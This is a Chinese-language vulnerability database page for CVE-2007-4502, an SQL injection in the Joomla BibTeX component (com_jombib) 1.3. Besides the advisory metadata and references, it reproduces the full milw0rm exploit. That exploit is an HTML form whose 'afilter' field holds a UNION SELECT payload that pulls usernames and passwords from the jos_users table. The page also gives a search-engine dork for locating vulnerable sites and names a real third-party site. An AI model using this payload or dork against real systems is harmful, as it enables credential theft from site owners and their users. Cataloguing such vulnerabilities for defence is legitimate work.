Joomla! BibTeX 组件'index.php'SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1113502 漏洞类型 SQL注入
发布时间 2007-08-23 更新时间 2007-08-23
CVE编号 CVE-2007-4502 CNNVD-ID CNNVD-200708-399
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/4310
https://www.securityfocus.com/bid/81595
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200708-399
|漏洞详情
Joomla!BibTeX组件(com_jombib)1.3版本及其早期版本的index.php中存在SQL注入漏洞。远程攻击者可以借助afilter参数,执行任意SQL指令。
|漏洞EXP
<html>
<head>
<title>Joomla Component BibTeX <= 1.3 Remote Blind SQL Injection Vulnerability</title>
</head>
<body>

<!-- # Title   :  Joomla Component BibTeX <= 1.3 Remote Blind SQL Injection Vulnerability -->
<!-- # Author  :  ajann -->
<!-- # Contact :  :( -->
<!-- # S.Page  :  http://www.everythingthatiknowabout.com -->
<!-- # $$      :  Free -->
<!-- # Dork    :  inurl:index.php?option=com_jombib -->
<!-- # DorkEx  :  http://www.google.com.tr/search?q=inurl:index.php%3Foption%3Dcom_jombib&hl=tr&start=0&sa=N -->
<!-- # .. -->
<!-- # TURKEY -->

<!-- # Note: Pls Edit [form action=] and Direct Submit // form action example: xx.xx/path/index.php?option=com_jombib-->




<form action="...." method="post" name="adminForm">

				<table>
					<tr>
							<td valign="bottom">
								Autore
								<input type="text" name="afilter" value="abcdefg' union select 111,222,333,444,555,1,1,1,1,1,2,3,4,5,6,1,2,3,4,5,3,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),5,4,2,2,2,2,2,0,0,0 from jos_users/*" class="inputbox" onchange="document.adminForm.submit();" size="20" />
							</td>
							<td valign="bottom">
								Titolo
								<input type="text" name="filter" value="" class="inputbox" onchange="document.adminForm.submit();" size="20" />
							</td>

							<td valign="bottom">
								<input type="submit" value="Direct Submit"/>
							</td>
							<td valign="bottom">
								   Ordina 
<select name="order" class="inputbox" size="1"  onchange="document.adminForm.submit();">
	<option value="ryear" selected="selected">Date desc</option>
	<option value="year">Date asc</option>

	<option value="title">Title asc</option>
	<option value="rtitle">Title desc</option>
	<option value="author">Author asc</option>
	<option value="rauthor">Author desc</option>
	<option value="journal">Journal asc</option>
	<option value="rjournal">Journal desc</option>

	<option value="type">Type</option>
</select>
							</td >
							<td nowrap="nowrap" valign="bottom">
								   Mostra 
<select name="limit" class="inputbox" size="1" onchange="document.location.href='http://www.gruppofrattura.it/index.php?option=com_jombib&&order=ryear&limit=' + this.options[selectedIndex].value + '&limitstart=0';">
	<option value="5">5</option>
	<option value="10">10</option>

	<option value="15">15</option>
	<option value="20">20</option>
	<option value="25">25</option>
	<option value="30">30</option>
	<option value="50" selected="selected">50</option>
</select>
							</td>

					</tr>
				</table>


		<input type="hidden" name="option" value="com_jombib" />
		<input type="hidden" name="catid" value="$catId" />
		</form>

</body>
</html>

# milw0rm.com [2007-08-23]
|受影响的产品
Joomla-addons.org Bibtex 1.3
|参考资料

来源:MILW0RM
名称:4310
链接:http://www.milw0rm.com/exploits/4310
来源:OSVDB
名称:38357
链接:http://osvdb.org/38357
来源:XF
名称:bibtex-comjombib-sql-injection(36225)
链接:http://xforce.iss.net/xforce/xfdb/36225